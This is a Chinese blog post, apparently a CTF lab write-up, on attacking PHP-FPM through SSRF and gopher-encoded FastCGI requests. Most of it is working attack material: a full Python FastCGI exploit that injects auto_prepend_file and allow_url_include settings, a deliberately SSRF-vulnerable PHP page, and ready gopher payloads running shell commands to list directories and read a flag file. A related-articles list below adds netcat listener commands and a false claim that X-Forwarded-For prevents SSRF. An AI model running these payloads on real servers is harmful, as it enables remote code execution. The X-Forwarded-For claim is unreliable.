SSRF 攻击PHP-FPM(FastCGI 攻击):学习总结仅供参考

最新推荐文章于 2024-09-23 16:11:03 发布
最新推荐文章于 2024-09-23 16:11:03 发布
阅读量1.9k 收藏 7
点赞数
分类专栏: CTF学习总结 笔记 文章标签: php linux 学习 python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2329794714/article/details/122196805
版权

利用条件:

        Libcurl版本:高于7.45.0

        PHP-FPM:监听端口,版本高于5.3.3

        知道目标机器上任意一个php文件绝对路径

一、FastCGI

fastcgi其实是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。

fastcgi协议则是服务器中间件和某个语言后端进行数据交换的协议。Fastcgi协议由多个record组成,record也有header和body一说,服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端,语言后端解码以后拿到具体数据,进行指定操作,并将结果再按照该协议封装好后返回给服务器中间件。

record的头固定8个字节,body的大小由头部中contentLenght指定(两字节),结构如下

typedef struct {
  /* Header */
  unsigned char version; // 版本
  unsigned char type; // 本次record的类型
  unsigned char requestIdB1; // 本次record对应的请求id
  unsigned char requestIdB0;
  unsigned char contentLengthB1; // body体的大小
  unsigned char contentLengthB0;
  unsigned char paddingLength; // 额外块大小
  unsigned char reserved;     //保留字段
 
  /* Body */
  unsigned char contentData[contentLength];     //body内容数据
  unsigned char paddingData[paddingLength];     //填充数据
} FCGI_Record;

 type字段选项

enum FCGI_Type {
  FCGI_BEGIN_REQUEST     = 1,  // (WEB->FastCGI) 表示一次请求的开始
  FCGI_ABORT_REQUEST     = 2,  // (WEB->FastCGI) 表示终止一次请求
  FCGI_END_REQUEST       = 3,  // (FastCGI->WEB) 请求已被处理完毕
  FCGI_PARAMS            = 4,  // (WEB->FastCGI) 表示一个向CGI程序传递的环境变量
  FCGI_STDIN             = 5,  // (WEB->FastCGI) 表示向CGI程序传递的标准输入
  FCGI_STDOUT            = 6,  // (FastCGI->WEB) 表示CGI程序的标准输出   
  FCGI_STDERR            = 7,  // (FastCGI->WEB) 表示CGI程序的标准错误输出
  FCGI_DATA              = 8,  // (WEB->FastCGI) 向CGI程序传递的额外数据
  FCGI_GET_VALUES        = 9,  // (WEB->FastCGI) 向FastCGI程序询问一些环境变量
  FCGI_GET_VALUES_RESULT = 10, // (FastCGI->WEB) 询问环境变量的结果
  FCGI_UNKNOWN_TYPE      = 11  // 未知类型,可能用作拓展
};

二、PHP-FPM

FastCGI是一个协议,PHP-FPM是实现了FastCGI协议的程序,全称PHP FastCGI Process Manager 即PHP FastCGI的进程管理器,运行在默认运行在9000端口。

 

 

现在知道服务器中间件与PHP_FPM使用FastCGI通信,那么我们可以伪造FastCGI协议包与PHP-FPM通信实现任意代码执行。FastCGI中只能传输配置信息,可以更改配置信息来实现任意代码执行。

        在php.ini中有如下两个配置项:

        auto_prepend_file:在执行目标文件前,先包含其指定的文件,其可以使用伪协议如:php://input.

        auto_append_file: 在执行目标文件后,包含其指向的文件

php://input:客户端HTTP请求中POST原始数据

如果设置 auto_prepend_file=php://input 那么每个文件执行前会包含HTTP请求中的POST数据,但php://input需要开启 allow_url_include:On,可以通过FastCGI中的PHP_ADMIN_VALUE选项修如:PHP_ADMIN_VALUE:allow_url_include:On

三、编写EXP(代码来自大佬)

import socket
import random
import argparse
import sys
from io import BytesIO

# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client

PY2 = True if sys.version_info.major == 2 else False     #判断python 版本


def bchr(i):
    if PY2:
        return force_bytes(chr(i))
    else:
        return bytes([i])

def bord(c):
    if isinstance(c, int):
        return c
    else:
        return ord(c)

def force_bytes(s):
    if isinstance(s, bytes):
        return s
    else:
        return s.encode('utf-8', 'strict')

def force_text(s):
    if issubclass(type(s), str):
        return s
    if isinstance(s, bytes):
        s = str(s, 'utf-8', 'strict')
    else:
        s = str(s)
    return s


class FastCGIClient:
    """A Fast-CGI Client for Python"""

    # private
    __FCGI_VERSION = 1

    __FCGI_ROLE_RESPONDER = 1
    __FCGI_ROLE_AUTHORIZER = 2
    __FCGI_ROLE_FILTER = 3

    __FCGI_TYPE_BEGIN = 1
    __FCGI_TYPE_ABORT = 2
    __FCGI_TYPE_END = 3
    __FCGI_TYPE_PARAMS = 4
    __FCGI_TYPE_STDIN = 5
    __FCGI_TYPE_STDOUT = 6
    __FCGI_TYPE_STDERR = 7
    __FCGI_TYPE_DATA = 8
    __FCGI_TYPE_GETVALUES = 9
    __FCGI_TYPE_GETVALUES_RESULT = 10
    __FCGI_TYPE_UNKOWNTYPE = 11

    __FCGI_HEADER_SIZE = 8

    # request state
    FCGI_STATE_SEND = 1
    FCGI_STATE_ERROR = 2
    FCGI_STATE_SUCCESS = 3

    def __init__(self, host, port, timeout, keepalive):
        self.host = host
        self.port = port
        self.timeout = timeout
        if keepalive:
            self.keepalive = 1
        else:
            self.keepalive = 0
        self.sock = None
        self.requests = dict()

    def __connect(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # if self.keepalive:
        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
        # else:
        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
        try:
            self.sock.connect((self.host, int(self.port)))
        except socket.error as msg:
            self.sock.close()
            self.sock = None
            print(repr(msg))
            return False
        return True

    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
        length = len(content)
        buf = bchr(FastCGIClient.__FCGI_VERSION) \
               + bchr(fcgi_type) \
               + bchr((requestid >> 8) & 0xFF) \
               + bchr(requestid & 0xFF) \
               + bchr((length >> 8) & 0xFF) \
               + bchr(length & 0xFF) \
               + bchr(0) \
               + bchr(0) \
               + content
        return buf

    def __encodeNameValueParams(self, name, value):
        nLen = len(name)
        vLen = len(value)
        record = b''
        if nLen < 128:
            record += bchr(nLen)
        else:
            record += bchr((nLen >> 24) | 0x80) \
                      + bchr((nLen >> 16) & 0xFF) \
                      + bchr((nLen >> 8) & 0xFF) \
                      + bchr(nLen & 0xFF)
        if vLen < 128:
            record += bchr(vLen)
        else:
            record += bchr((vLen >> 24) | 0x80) \
                      + bchr((vLen >> 16) & 0xFF) \
                      + bchr((vLen >> 8) & 0xFF) \
                      + bchr(vLen & 0xFF)
        return record + name + value

    def __decodeFastCGIHeader(self, stream):
        header = dict()
        header['version'] = bord(stream[0])
        header['type'] = bord(stream[1])
        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
        header['paddingLength'] = bord(stream[6])
        header['reserved'] = bord(stream[7])
        return header

    def __decodeFastCGIRecord(self, buffer):
        header = buffer.read(int(self.__FCGI_HEADER_SIZE))

        if not header:
            return False
        else:
            record = self.__decodeFastCGIHeader(header)
            record['content'] = b''
            
            if 'contentLength' in record.keys():
                contentLength = int(record['contentLength'])
                record['content'] += buffer.read(contentLength)
            if 'paddingLength' in record.keys():
                skiped = buffer.read(int(record['paddingLength']))
            return record

    def request(self, nameValuePairs={}, post=''):
        if not self.__connect():
            print('connect failure! please check your fasctcgi-server !!')
            return

        requestId = random.randint(1, (1 << 16) - 1)    # 1 --65535
        self.requests[requestId] = dict()
        request = b""
        beginFCGIRecordContent = bchr(0) \
                                 + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
                                 + bchr(self.keepalive) \
                                 + bchr(0) * 5
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                              beginFCGIRecordContent, requestId)
        paramsRecord = b''
        if nameValuePairs:
            for (name, value) in nameValuePairs.items():
                name = force_bytes(name)
                value = force_bytes(value)
                paramsRecord += self.__encodeNameValueParams(name, value)

        if paramsRecord:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)

        if post:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)

        self.sock.send(request)
        self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
        self.requests[requestId]['response'] = b''
        return self.__waitForResponse(requestId)

    def __waitForResponse(self, requestId):
        data = b''
        while True:
            buf = self.sock.recv(512)
            if not len(buf):
                break
            data += buf

        data = BytesIO(data)
        while True:
            response = self.__decodeFastCGIRecord(data)
            if not response:
                break
            if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
                    or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                    self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
                if requestId == int(response['requestId']):
                    self.requests[requestId]['response'] += response['content']
            if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
                self.requests[requestId]
        return self.requests[requestId]['response']

    def __repr__(self):
        return "fastcgi connect host:{} port:{}".format(self.host, self.port)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')
    parser.add_argument('host', help='Target host, such as 127.0.0.1')
    parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')
    parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')
    parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)

    args = parser.parse_args()

    client = FastCGIClient(args.host, args.port, 3, 0)
    params = dict()
    documentRoot = "/"
    uri = args.file
    content = args.code
    params = {
        'GATEWAY_INTERFACE': 'FastCGI/1.0',
        'REQUEST_METHOD': 'POST',
        'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
        'SCRIPT_NAME': uri,
        'QUERY_STRING': '',
        'REQUEST_URI': uri,
        'DOCUMENT_ROOT': documentRoot,
        'SERVER_SOFTWARE': 'php/fcgiclient',
        'REMOTE_ADDR': '127.0.0.1',
        'REMOTE_PORT': '9985',
        'SERVER_ADDR': '127.0.0.1',
        'SERVER_PORT': '80',
        'SERVER_NAME': "localhost",
        'SERVER_PROTOCOL': 'HTTP/1.1',
        'CONTENT_TYPE': 'application/text',
        'CONTENT_LENGTH': "%d" % len(content),
        'PHP_VALUE': 'auto_prepend_file = php://input',
        'PHP_ADMIN_VALUE': 'allow_url_include = On'
    }
    response = client.request(params, content)
    print(force_text(response))

四、实验靶场搭建

1、环境准备

腾讯云服务器:ubuntu

nginx  php-fpm(7.4)   Libcurl(7.74)

php-fpm监听9000端口,nginx将php义务转发自9000端口

php扩展curl模块 (apt-getinstall php7-fpm) 

 php.ini中导入curl.so配置: 

2、建一存在ssrf漏洞的站点:

<?php

$url=$_GET['url'];
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,0);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);
$res=curl_exec($ch);
curl_close($ch);



?>

输入网址:http://ip/index.php?url=www.baidu.com  验证站点

3、在根目录下放flag文件

 五、攻击练习

伪造FastCGI数据:

利用大佬写好的脚本运行

 python fpm.py -c "<?php system('ls /');?>" -p 12345 127.0.0.1 /var/www/html/index.php

 另一边监听端口得到数据

 

 xxd 查看数据

 将数据url两次编码:

利用脚本

# -*- coding: UTF-8 -*-
from urllib.parse import quote, unquote, urlencode
file= open('1.txt','rb')
payload= file.read()
payload= quote(payload).replace("%0A","%0A%0D")
print("gopher://127.0.0.1:9000/_"+quote(payload))

 得到gopher数据

gopher://127.0.0.1:9000/_%2501%2501P%25A8%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504P%25A8%2501%25DB%2500%2500%250E%2502CONTENT_LENGTH23%250C%2510CONTENT_TYPEapplication/text%250B%2504REMOTE_PORT9985%250B%2509SERVER_NAMElocalhost%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250E%2504REQUEST_METHODPOST%250B%2502SERVER_PORT80%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2500QUERY_STRING%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%250D%2501DOCUMENT_ROOT/%250B%2509SERVER_ADDR127.0.0.1%250B%2517REQUEST_URI/var/www/html/index.php%2501%2504P%25A8%2500%2500%2500%2500%2501%2505P%25A8%2500%2517%2500%2500%253C%253Fphp%2520system%2528%2527ls%2520/%2527%2529%253B%253F%253E%2501%2505P%25A8%2500%2500%2500%2500

在浏览器通过ssrf漏洞站点将数据打入 成功爆出根目录 发现falg 文件

 现在同样伪造数据将falg文件内容爆出

 python fpm.py -c "<?php system('cat /falg');?>" -p 12345 127.0.0.1 /var/www/html/index.php

 得到数据

gopher://127.0.0.1:9000/_%2501%2501%2518.%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2518.%2501%25DB%2500%2500%250E%2502CONTENT_LENGTH28%250C%2510CONTENT_TYPEapplication/text%250B%2504REMOTE_PORT9985%250B%2509SERVER_NAMElocalhost%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250E%2504REQUEST_METHODPOST%250B%2502SERVER_PORT80%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2500QUERY_STRING%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%250D%2501DOCUMENT_ROOT/%250B%2509SERVER_ADDR127.0.0.1%250B%2517REQUEST_URI/var/www/html/index.php%2501%2504%2518.%2500%2500%2500%2500%2501%2505%2518.%2500%251C%2500%2500%253C%253Fphp%2520system%2528%2527cat%2520/flag%2527%2529%253B%253F%253E%2501%2505%2518.%2500%2500%2500%2500

成功爆出flag

 

----已搬运------浅入深出 Fastcgi 协议分析与 PHP-FPM 攻击方法--------学习子自大佬的教程 ftp那里没做完
Zero_Adam的博客
06-12 7005
目录:0. 前面的一些基础知识,从中摘抄的一些。1.利用 fcgi_exp.go 攻击使用条件:2. 本地实验:2.利用 phith0n 大神的 fpm.py3.SSRF 中对 FPM/FastCGI攻击使用条件:2. 本地实验:4. FTP - SSRF 攻击 FPM/FastCGI 学习自:WHOAMI大佬的。 过程中有报错,也能够解决了。很棒很棒的教程。!!! 0. 前面的一些基础知识,从中摘抄的一些。 Fastcgi是一个通信协议,和HTTP协议一样,进行数据交换的一个通道。 默认php-fpm
----已搬运----[蓝帽杯 2021]One Pointer PHP --- PHP数组溢出,Fastcgi FTP - SSRF 攻击 php-fpm - SUID提权 proc
Zero_Adam的博客
06-11 877
二、学到的&&不足: 三、学习WP: 给了源码,两个PHP文件: user.php: <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $us
SSRF之攻击FastCGI
weixin_50464560的博客
07-03 1081
前言 上篇文章在讲利用SSRF漏洞攻击内网的Redis的时候提到了Gopher协议,说到了这个协议作为SSRF漏洞利用中的万金油,可以用它来攻击内网的FTP、Telnet、Redis、Memcache、FastCGI等应用,那么这篇文章就来介绍一下FastCGI以及利用SSRF结合Gopher协议攻击FastCGI FastCGI 维基百科的解释:快速通用网关接口(Fast Common Gateway Interface/FastCGI)是一种让交互程序与Web服务器通信的协议。FastCGI是早期通用网
XSS,CSRF,SSRF 之间的区别
最新发布
weixin_61315501的博客
09-23 792
alert(1)
fastCGI 攻击
streetlight8023的专栏
08-18 472
案例 接收一个项目,一个方法中过多调用数据库资源,导致mysql 负荷一直居高不下。检查tomcat日志发现了大量sql语法错误的日志。原来页面传递过来的参数被人修改了,后来增加了后台代码校验 屏蔽了非法字符攻击。算是完成
php-fpm:用WebShell攻击PHP-FPM用WebShell攻击PHP-FPM
03-11
用WebShell攻击PHP-FPM 来自大佬的文末一个想法 快速实现了一个poc,可以实现任意代码执行 后续用单文件PHP实现一个FastCgi Client,然后已知PHP文件就用WebShell本身,没有什么骚操作的话WebShell应该就是免杀的 使用 测试php7.3-fpm,在TCP模式和本地socket都可以运行 echo "<?php echo 1; ?>" > /tmp/poc.php nc -lvp 6666 > payload.txt python fpm.py -c '<?php echo `id`; exit;?>' -p 6666 127.0.0.1 /tmp/poc.php 运行poc.php php poc.php 参考 fpm.py来自
linux nginx php-fpm攻击
weixin_30871293的博客
05-31 357
1.nginx错误日志:报错 2018/05/30 16:30:55 [error] 8765#0: *1485 connect() to unix:/tmp/php-70-cgi.sock failed (11: Resource temporarily unavailable) while connecting to upstream, client: 176.31.106.27, serv...
CTFHUB-SSRF-FastCGI协议
qq_62078839的博客
04-23 1973
Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 第一种方式 exp import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client PY2 = True if sys.version_info.major == 2 el
SSRF学习(6)FastCGI协议
m0_64417923的博客
05-16 226
这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助 FastCGI原理: Wikipedia对FastCGI的解释:快速通用网关接口(FastCommon Gateway Interface/FastCGI)是一种让交互程序与Web服务器通信的协议。FastCGI是早期通用网关接口(CGI)的增强版本。FastCGI致力于减少网页服务器与CGI程序之间交互的开销,从而使服务器可以同时处理更多的网页请求。 php-fpm 官方对php-fpm的解释是FPM(FastCG..
------------已搬运----2021.6.1萌新赛-impossible ip FastCGI 攻击 php-fpm简单的绑定 公网 127.0.0.1的 9000 地址 -- 注意 waf
Zero_Adam的博客
06-12 982
学习WP 考点: php socket 伪造http请求ssrf 攻击php-fpm实现伪造ip <?php highlight_file(__FILE__); error_reporting(0); $data=base64_decode($_GET['data']); $host=$_GET['host']; $port=$_GET['port']; if(preg_match('/usr|auto|log/i' ,$data)) { die("error"); } $fp=fsoc
php-fpm rce攻击
蚁景网安学院
09-27 2006
0x00 somethingPHP-FPM(FastCGI Process Manager):FastCGI进程管理器FastCGIFastCGI 本身是一个协议,是服务器中间件和某个语...
[2021强网杯青少年]ssrf+fpm
Huamang的博客
09-26 451
best_php <?php highlight_file(__FILE__); //like fpm? class Crawl{ public $url; function __construct($url){ if(substr($url,0,7)==="http://"){ $this->url = $url; }else{ $this->url = "http://127.0.0.1/"
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
qq_75120258的博客
03-29 2469
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.phpFastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
SSRF--gopher协议打FastCGI
unexpectedthing的博客
11-30 6209
FastCGI 定义: 什么是CGI CGI全称"通用网关接口"(Common Gateway Interface),用于HTTP服务器与其它机器上的程序服务通信交流的一种工具,CGI程序须运行在网络服务器上。 传统CGI接口方式的主要缺点是性能较差,因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析,然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的,因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。 什么是FastCGI FastCGI是一个可伸缩地、高速地
ssrf漏洞之php-fpm未授权访问漏洞利用
banliyaoguai的博客
08-26 295
我们先看一下web.php的请求头,发现是nginx,然后这还是一个php页面。上面是合理的猜测,当然你也可以尝试用nmap扫描一下,扫出来没有不一定真没有,有可能人家的9000端口绑定在127.0.0.1上,这样你扫描他的IP是扫不出来的。下面来看一下payload解码后的内容,就是我们php-fpm未授权访问的两个字段。首先代码中对url的输入没有一点过滤,很明显的一个ssrf漏洞。这里我们环境是有9000端口的,如果没有的可以安装一下。在你的网站目录下创建一个新的php文件,内容如下。
一道题学习ssrf利用ftp被动模式打fpm
m0_62422842的博客
10-17 1567
听别的师傅说ssrf打ftp已经是常考点了,所以今天结合陇原战“疫“的一道赛题学习一下ssrf利用ftp的被动模式攻击fpm的技巧。
两道CTF题--FTP被动模式打php-fpm
unexpectedthing的博客
02-25 1852
文章目录[陇原战疫2021网络安全大赛]eaaasyphp考点思路总结解题先看phpinfo():我们先尝试写入shellFTP的被动模式打FastCGI蓝帽杯2021 One Pointer PHP考点php数组溢出命令执行拿webshell方法1:绕过open_basedir利用未授权打FPM RCE加载恶意so文件开启FTP服务器上传文件处理伪造恶意FastCGI请求流程SUID提权总结方法2:步骤:原理: [陇原战疫2021网络安全大赛]eaaasyphp 考点 反序列化–pop链的构成 F
ssrf简单理解php代码
qq_62046696的博客
04-21 605
ssrf 服务器端请求伪造 是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞 echo file_get_contents($_GET['url']); 127.0.0.1/url.php?url=http://www.baidu.com 一些绕过 1.加端口 127.0.0.1:80 2.短网址 3.指向任意Ip的域名 xip.io 127.0.0.1.xip.io 4.ip限制绕过 十进制转换(转换成16进制再转换回来,把.换成0,http://Ox7f000001,十进制就是http...
php入门ssrf
五分之一世纪
08-15 488
文章目录(1)什么是ssrf(2)ssrf的危害(3)php中造成ssrf的函数<1>file_get_contents函数<2>fsockopen函数<3>curl_exec函数ssrf的具体利用方式 (1)什么是ssrf ssrf(server-side request forgery)中文名称是服务端请求伪造,它是一种由攻击者构造形 成由服务器发起请求的一个漏洞。让服务器去请求通常请求不到的东西。 一般用来在外网探测或攻击内网服务。 (2)ssrf的危害 1、因
24.下面哪个请求头可以用于防止SSRF攻击? X-Content-Type-Options X-Forwarded-For X-Frame-Options X-XSS-Protection
07-20
X-Forwarded-For请求头可以用于防止SSRF(Server-Side Request Forgery,服务器端请求伪造)攻击SSRF攻击是一种利用服务器端应用程序的漏洞,使攻击者能够发送伪造的请求到内部网络或其他受信任的服务器的攻击方式。攻击者可以通过构造恶意的请求,欺骗服务器端应用程序访问或执行受限资源。 X-Forwarded-For请求头是一种常见的HTTP请求头,用于指示请求的真实客户端IP地址。在防止SSRF攻击方面,服务器端应用程序可以检查X-Forwarded-For请求头中的IP地址,以确保请求来自可信的来源。 其他列出的请求头也与安全相关,但与防止SSRF攻击无直接关联,它们的作用如下: - X-Content-Type-Options:用于指示浏览器是否应该嗅探响应的内容类型。它可以帮助防止某些类型的跨站脚本攻击(XSS),但与SSRF攻击无关。 - X-Frame-Options:用于指示浏览器是否允许通过框架嵌入网页。它有助于防止点击劫持攻击,但与SSRF攻击无关。 - X-XSS-Protection:用于启用或禁用浏览器内置的跨站脚本攻击(XSS)过滤器。它也是与防止XSS攻击有关,与SSRF攻击无直接关联。 因此,X-Forwarded-For是用于防止SSRF攻击的请求头选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值